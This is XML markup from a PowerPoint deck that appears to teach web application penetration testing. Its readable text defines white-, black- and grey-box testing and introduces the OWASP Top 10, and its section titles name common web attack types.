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2" r:id="rId2"/>
    <p:sldMasterId id="2147483651" r:id="rId3"/>
    <p:sldMasterId id="2147483673" r:id="rId4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId68"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="349" r:id="rId5"/>
    <p:sldId id="434" r:id="rId6"/>
    <p:sldId id="353" r:id="rId7"/>
    <p:sldId id="359" r:id="rId8"/>
    <p:sldId id="259" r:id="rId9"/>
    <p:sldId id="360" r:id="rId10"/>
    <p:sldId id="437" r:id="rId11"/>
    <p:sldId id="483" r:id="rId12"/>
    <p:sldId id="377" r:id="rId13"/>
    <p:sldId id="330" r:id="rId14"/>
    <p:sldId id="492" r:id="rId15"/>
    <p:sldId id="493" r:id="rId16"/>
    <p:sldId id="494" r:id="rId17"/>
    <p:sldId id="495" r:id="rId18"/>
    <p:sldId id="496" r:id="rId19"/>
    <p:sldId id="497" r:id="rId20"/>
    <p:sldId id="498" r:id="rId21"/>
    <p:sldId id="499" r:id="rId22"/>
    <p:sldId id="471" r:id="rId23"/>
    <p:sldId id="436" r:id="rId24"/>
    <p:sldId id="393" r:id="rId25"/>
    <p:sldId id="472" r:id="rId26"/>
    <p:sldId id="473" r:id="rId27"/>
    <p:sldId id="474" r:id="rId28"/>
    <p:sldId id="475" r:id="rId29"/>
    <p:sldId id="476" r:id="rId30"/>
    <p:sldId id="477" r:id="rId31"/>
    <p:sldId id="479" r:id="rId32"/>
    <p:sldId id="480" r:id="rId33"/>
    <p:sldId id="482" r:id="rId34"/>
    <p:sldId id="478" r:id="rId35"/>
    <p:sldId id="391" r:id="rId36"/>
    <p:sldId id="413" r:id="rId37"/>
    <p:sldId id="392" r:id="rId38"/>
    <p:sldId id="414" r:id="rId39"/>
    <p:sldId id="438" r:id="rId40"/>
    <p:sldId id="484" r:id="rId41"/>
    <p:sldId id="450" r:id="rId42"/>
    <p:sldId id="459" r:id="rId43"/>
    <p:sldId id="455" r:id="rId44"/>
    <p:sldId id="464" r:id="rId45"/>
    <p:sldId id="465" r:id="rId46"/>
    <p:sldId id="466" r:id="rId47"/>
    <p:sldId id="491" r:id="rId48"/>
    <p:sldId id="454" r:id="rId49"/>
    <p:sldId id="500" r:id="rId50"/>
    <p:sldId id="456" r:id="rId51"/>
    <p:sldId id="468" r:id="rId52"/>
    <p:sldId id="462" r:id="rId53"/>
    <p:sldId id="463" r:id="rId54"/>
    <p:sldId id="489" r:id="rId55"/>
    <p:sldId id="490" r:id="rId56"/>
    <p:sldId id="453" r:id="rId57"/>
    <p:sldId id="457" r:id="rId58"/>
    <p:sldId id="458" r:id="rId59"/>
    <p:sldId id="460" r:id="rId60"/>
    <p:sldId id="461" r:id="rId61"/>
    <p:sldId id="467" r:id="rId62"/>
    <p:sldId id="485" r:id="rId63"/>
    <p:sldId id="486" r:id="rId64"/>
    <p:sldId id="487" r:id="rId65"/>
    <p:sldId id="488" r:id="rId66"/>
    <p:sldId id="47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0C9881-BE30-4CFC-80B5-F788F9BFBC55}">
          <p14:sldIdLst>
            <p14:sldId id="349"/>
            <p14:sldId id="434"/>
            <p14:sldId id="353"/>
            <p14:sldId id="359"/>
            <p14:sldId id="259"/>
            <p14:sldId id="360"/>
            <p14:sldId id="437"/>
            <p14:sldId id="483"/>
            <p14:sldId id="377"/>
            <p14:sldId id="330"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Attack\" id="{C28FF3BC-D332-41BA-A935-2066D892ECF7}">
          <p14:sldIdLst>
            <p14:sldId id="492"/>
            <p14:sldId id="493"/>
            <p14:sldId id="494"/>
            <p14:sldId id="495"/>
            <p14:sldId id="496"/>
            <p14:sldId id="497"/>
            <p14:sldId id="498"/>
            <p14:sldId id="499"/>
            <p14:sldId id="471"/>
            <p14:sldId id="436"/>
            <p14:sldId id="393"/>
            <p14:sldId id="472"/>
            <p14:sldId id="473"/>
            <p14:sldId id="474"/>
            <p14:sldId id="475"/>
            <p14:sldId id="476"/>
            <p14:sldId id="477"/>
            <p14:sldId id="479"/>
            <p14:sldId id="480"/>
            <p14:sldId id="482"/>
            <p14:sldId id="478"/>
            <p14:sldId id="391"/>
            <p14:sldId id="413"/>
            <p14:sldId id="392"/>
            <p14:sldId id="414"/>
            <p14:sldId id="438"/>
            <p14:sldId id="484"/>
            <p14:sldId id="450"/>
            <p14:sldId id="459"/>
            <p14:sldId id="455"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="XSS" id="{DE06CE48-F1BF-4D8C-8CCA-ADA8BF5B4C90}">
          <p14:sldIdLst>
            <p14:sldId id="464"/>
            <p14:sldId id="465"/>
            <p14:sldId id="466"/>
            <p14:sldId id="491"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="COMMAND INJECTION" id="{0F81A645-D9F2-4283-8FDA-F4EB27BEC0EA}">
          <p14:sldIdLst>
            <p14:sldId id="454"/>
            <p14:sldId id="500"/>
            <p14:sldId id="456"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="BRUTE FORCE" id="{B1A3CB73-F695-475C-98A4-8FFA241C8DA0}">
          <p14:sldIdLst>
            <p14:sldId id="468"/>
            <p14:sldId id="462"/>
            <p14:sldId id="463"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="FILE UPLOAD" id="{FECA5D38-32C1-4D0D-8BF3-D94DB9F6257E}">
          <p14:sldIdLst>
            <p14:sldId id="489"/>
            <p14:sldId id="490"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="SQLi" id="{B297EEBE-98DE-41ED-A15E-662364D74917}">
          <p14:sldIdLst>
            <p14:sldId id="453"/>
            <p14:sldId id="457"/>
            <p14:sldId id="458"/>
            <p14:sldId id="460"/>
            <p14:sldId id="461"/>
            <p14:sldId id="467"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="FILE INCLUSION" id="{1B75F659-AFFB-47E8-89FD-DB27E28C5CEC}">
          <p14:sldIdLst>
            <p14:sldId id="485"/>
            <p14:sldId id="486"/>
            <p14:sldId id="487"/>
            <p14:sldId id="488"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="QUIZ" id="{F88DE804-570C-432A-AF85-36258D948B17}">
          <p14:sldIdLst>
            <p14:sldId id="470"/>
          </p14:sldIdLst>
        </p14:section>
      </p14:sectionLst>
    </p:ext>
    <p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" orient="horz" pos="2136"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3B81"/>
    <a:srgbClr val="15005D"/>
    <a:srgbClr val="13005A"/>
    <a:srgbClr val="170156"/>
    <a:srgbClr val="080808"/>
    <a:srgbClr val="1C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5033" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="82" d="100"/>
          <a:sy n="82" d="100"/>
        </p:scale>
        <p:origin x="557" y="72"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2136"/>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025667-0473-4520-8003-7FAEADD844E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MY"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F63B1960-D3A5-44B2-B9ED-D724C0E6C9F3}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-MY" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>White Box</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7C1B7F1D-A385-4C80-8C81-292101247B3C}" type="parTrans" cxnId="{3CDD758D-9F99-4097-AC68-E04A684CFB01}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-MY"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CFCB9CCB-8E64-4DA3-A868-AD6079BA91B8}" type="sibTrans" cxnId="{3CDD758D-9F99-4097-AC68-E04A684CFB01}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-MY"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{24E6CBF7-7D76-4F5D-BCB5-0C5C42AC58D8}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Tester has complete access and in-depth knowledge of the system. Access to source code is usually given.</a:t>
          </a:r>
          <a:endParaRPr lang="en-MY" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{034E9545-C2CC-4177-947C-66005E8B777C}" type="parTrans" cxnId="{D7933B3C-EEF8-44DD-87E4-43BACFAB0985}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-MY"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{844744DC-23F0-4BFC-870A-997953FAB994}" type="sibTrans" cxnId="{D7933B3C-EEF8-44DD-87E4-43BACFAB0985}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-MY"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F000E9D3-63C4-4FDE-894E-41BB0D6687ED}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-MY" dirty="0"/>
            <a:t>Black Box</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1A3D2998-4883-49C2-B1BF-22EFB484303D}" type="parTrans" cxnId="{B7CB2E35-CB67-48A0-A906-535401ED4B84}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-MY"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FBA29A03-E143-4782-ADA5-6C591F9A1733}" type="sibTrans" cxnId="{B7CB2E35-CB67-48A0-A906-535401ED4B84}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-MY"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9FE1EF1-EFE1-4B16-B38A-88C44E20D379}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Tester is given little to no information about the system. Just the URL of the application is usually given.</a:t>
          </a:r>
          <a:endParaRPr lang="en-MY" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{59BB1CC5-0A9A-4868-AF47-DAE80685D4E5}" type="parTrans" cxnId="{FA39BD92-711C-43B5-9D68-9BA921ECE395}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-MY"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FD44EC89-9E28-4388-A873-8CF012CC7901}" type="sibTrans" cxnId="{FA39BD92-711C-43B5-9D68-9BA921ECE395}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-MY"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3DF3BF79-1FFF-4395-ADC6-5A41AEB1B76B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-MY" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Grey Box</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2F4DD154-8B37-4352-AAC6-9242D16FF063}" type="parTrans" cxnId="{4DDEE4E7-6781-4937-B2CB-C88E6A933A6D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-MY"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{62B1EB3A-1BC3-4D53-AB5E-E8CF90B8E775}" type="sibTrans" cxnId="{4DDEE4E7-6781-4937-B2CB-C88E6A933A6D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-MY"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{829BF31D-06CE-4DE9-AA8C-24AADADDC194}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Combination of white box and black box penetration testing. Limited information and access is given to the tester.</a:t>
          </a:r>
          <a:endParaRPr lang="en-MY" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{868E866B-A81B-447C-98F9-628BD8009D56}" type="parTrans" cxnId="{B282A70C-3292-47B2-B724-AD1112917932}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-MY"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A57DDA8B-8933-473B-AD71-23718DFE19D2}" type="sibTrans" cxnId="{B282A70C-3292-47B2-B724-AD1112917932}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-MY"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1FCF681-39E2-4463-8E9C-92590DEA05C4}" type="pres">
      <dgm:prSet presAssocID="{AE025667-0473-4520-8003-7FAEADD844E3}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FBED46A0-92ED-4182-8190-3E25C085DF2D}" type="pres">
      <dgm:prSet presAssocID="{F63B1960-D3A5-44B2-B9ED-D724C0E6C9F3}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{100D3333-C5B3-4D4D-8FF8-6261EEB4539E}" type="pres">
      <dgm:prSet presAssocID="{F63B1960-D3A5-44B2-B9ED-D724C0E6C9F3}" presName="childText" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7967C015-4E00-4716-B659-12B8E84F09BC}" type="pres">
      <dgm:prSet presAssocID="{F000E9D3-63C4-4FDE-894E-41BB0D6687ED}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{25FF7226-31ED-4ED6-9386-9FC84DFB7413}" type="pres">
      <dgm:prSet presAssocID="{F000E9D3-63C4-4FDE-894E-41BB0D6687ED}" presName="childText" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{307ED9BF-7CDD-4B86-A756-4C9F19DE2DE2}" type="pres">
      <dgm:prSet presAssocID="{3DF3BF79-1FFF-4395-ADC6-5A41AEB1B76B}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FA46E59C-A290-4239-9C4D-B12D8BED78E0}" type="pres">
      <dgm:prSet presAssocID="{3DF3BF79-1FFF-4395-ADC6-5A41AEB1B76B}" presName="childText" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{F5CFB101-D1BB-4F5E-8DB1-5568FAD605C4}" type="presOf" srcId="{3DF3BF79-1FFF-4395-ADC6-5A41AEB1B76B}" destId="{307ED9BF-7CDD-4B86-A756-4C9F19DE2DE2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{03183C02-4A0E-4E0C-9B06-ED85E03665E6}" type="presOf" srcId="{F000E9D3-63C4-4FDE-894E-41BB0D6687ED}" destId="{7967C015-4E00-4716-B659-12B8E84F09BC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B282A70C-3292-47B2-B724-AD1112917932}" srcId="{3DF3BF79-1FFF-4395-ADC6-5A41AEB1B76B}" destId="{829BF31D-06CE-4DE9-AA8C-24AADADDC194}" srcOrd="0" destOrd="0" parTransId="{868E866B-A81B-447C-98F9-628BD8009D56}" sibTransId="{A57DDA8B-8933-473B-AD71-23718DFE19D2}"/>
    <dgm:cxn modelId="{B7CB2E35-CB67-48A0-A906-535401ED4B84}" srcId="{AE025667-0473-4520-8003-7FAEADD844E3}" destId="{F000E9D3-63C4-4FDE-894E-41BB0D6687ED}" srcOrd="1" destOrd="0" parTransId="{1A3D2998-4883-49C2-B1BF-22EFB484303D}" sibTransId="{FBA29A03-E143-4782-ADA5-6C591F9A1733}"/>
    <dgm:cxn modelId="{D7933B3C-EEF8-44DD-87E4-43BACFAB0985}" srcId="{F63B1960-D3A5-44B2-B9ED-D724C0E6C9F3}" destId="{24E6CBF7-7D76-4F5D-BCB5-0C5C42AC58D8}" srcOrd="0" destOrd="0" parTransId="{034E9545-C2CC-4177-947C-66005E8B777C}" sibTransId="{844744DC-23F0-4BFC-870A-997953FAB994}"/>
    <dgm:cxn modelId="{2B8E8964-80AF-4B69-8C60-FFBC8C0BF28A}" type="presOf" srcId="{829BF31D-06CE-4DE9-AA8C-24AADADDC194}" destId="{FA46E59C-A290-4239-9C4D-B12D8BED78E0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{3CDD758D-9F99-4097-AC68-E04A684CFB01}" srcId="{AE025667-0473-4520-8003-7FAEADD844E3}" destId="{F63B1960-D3A5-44B2-B9ED-D724C0E6C9F3}" srcOrd="0" destOrd="0" parTransId="{7C1B7F1D-A385-4C80-8C81-292101247B3C}" sibTransId="{CFCB9CCB-8E64-4DA3-A868-AD6079BA91B8}"/>
    <dgm:cxn modelId="{CCBB0590-A534-4BC5-B29C-D583C53054B6}" type="presOf" srcId="{24E6CBF7-7D76-4F5D-BCB5-0C5C42AC58D8}" destId="{100D3333-C5B3-4D4D-8FF8-6261EEB4539E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{FA39BD92-711C-43B5-9D68-9BA921ECE395}" srcId="{F000E9D3-63C4-4FDE-894E-41BB0D6687ED}" destId="{A9FE1EF1-EFE1-4B16-B38A-88C44E20D379}" srcOrd="0" destOrd="0" parTransId="{59BB1CC5-0A9A-4868-AF47-DAE80685D4E5}" sibTransId="{FD44EC89-9E28-4388-A873-8CF012CC7901}"/>
    <dgm:cxn modelId="{B3DB81A0-4665-47CD-99FB-16954C9C9620}" type="presOf" srcId="{AE025667-0473-4520-8003-7FAEADD844E3}" destId="{E1FCF681-39E2-4463-8E9C-92590DEA05C4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C92CAEA1-7E7B-4C3F-B3F6-2B03F0A44555}" type="presOf" srcId="{A9FE1EF1-EFE1-4B16-B38A-88C44E20D379}" destId="{25FF7226-31ED-4ED6-9386-9FC84DFB7413}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{BEC7E4DA-AA09-4464-AB94-EEA5E0E842F1}" type="presOf" srcId="{F63B1960-D3A5-44B2-B9ED-D724C0E6C9F3}" destId="{FBED46A0-92ED-4182-8190-3E25C085DF2D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{4DDEE4E7-6781-4937-B2CB-C88E6A933A6D}" srcId="{AE025667-0473-4520-8003-7FAEADD844E3}" destId="{3DF3BF79-1FFF-4395-ADC6-5A41AEB1B76B}" srcOrd="2" destOrd="0" parTransId="{2F4DD154-8B37-4352-AAC6-9242D16FF063}" sibTransId="{62B1EB3A-1BC3-4D53-AB5E-E8CF90B8E775}"/>
    <dgm:cxn modelId="{6C201FBF-F619-4FB7-A954-E41190233002}" type="presParOf" srcId="{E1FCF681-39E2-4463-8E9C-92590DEA05C4}" destId="{FBED46A0-92ED-4182-8190-3E25C085DF2D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{EA663883-4FF5-42A4-BF6A-1D2F0CDDD3D0}" type="presParOf" srcId="{E1FCF681-39E2-4463-8E9C-92590DEA05C4}" destId="{100D3333-C5B3-4D4D-8FF8-6261EEB4539E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C2443951-8C5B-4A2E-8692-62C8722EC4CF}" type="presParOf" srcId="{E1FCF681-39E2-4463-8E9C-92590DEA05C4}" destId="{7967C015-4E00-4716-B659-12B8E84F09BC}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{7736853A-9412-4BC6-BA9E-1BCE596FBEED}" type="presParOf" srcId="{E1FCF681-39E2-4463-8E9C-92590DEA05C4}" destId="{25FF7226-31ED-4ED6-9386-9FC84DFB7413}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E7A22746-9C6D-45BB-A90F-58256791B0DC}" type="presParOf" srcId="{E1FCF681-39E2-4463-8E9C-92590DEA05C4}" destId="{307ED9BF-7CDD-4B86-A756-4C9F19DE2DE2}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{749A22F3-7CDA-45E7-A4F2-6E74A4968C40}" type="presParOf" srcId="{E1FCF681-39E2-4463-8E9C-92590DEA05C4}" destId="{FA46E59C-A290-4239-9C4D-B12D8BED78E0}"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10DFE3-5D3A-4677-9062-80AD679CDD25}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/hList3" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d4" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent0_2" csCatId="mainScheme" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-MY"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4973D1BB-842E-4BD4-98BE-51B93D58AC35}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-MY" sz="4000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9AFB1E61-5E21-4DC3-B8E7-EEA3B3EEF1CF}" type="parTrans" cxnId="{60F1F38C-4FB6-41DF-BCF6-AD43CB8A2D5B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-MY"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E6D6FDE4-2B6B-45BE-BC31-3307870DE2AD}" type="sibTrans" cxnId="{60F1F38C-4FB6-41DF-BCF6-AD43CB8A2D5B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-MY"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0D3BD204-8464-4D23-B363-147721D63B5F}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>The OWASP Top 10 is a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>standard awareness document </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>for developers and web application security. </a:t>
          </a:r>
          <a:endParaRPr lang="en-MY" sz="1800" dirty="0"/>
        </a:p>
        <a:p>
          <a:endParaRPr lang="en-MY" sz="2100" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A0279B4B-6CBC-48D6-BC84-05CCFAE5A892}" type="parTrans" cxnId="{30CC7062-285B-4687-9BC7-11A583C484CF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-MY"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5FF2B386-A774-4F6E-96A9-A1D9388A02D6}" type="sibTrans" cxnId="{30CC7062-285B-4687-9BC7-11A583C484CF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-MY"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8B2219EE-210D-426F-BF1D-137081F916F1}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>It represents a broad consensus about the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>most critical security risks </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>to web applications.</a:t>
          </a:r>
          <a:endParaRPr lang="en-MY" sz="1800" dirty="0"/>
        </a:p>
        <a:p>
          <a:endParaRPr lang="en-MY" sz="2100" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9476FA12-87CA-439C-8E71-CC6367446D6B}" type="parTrans" cxnId="{C713D045-5A27-493E-928E-F57F11A3BECB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-MY"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
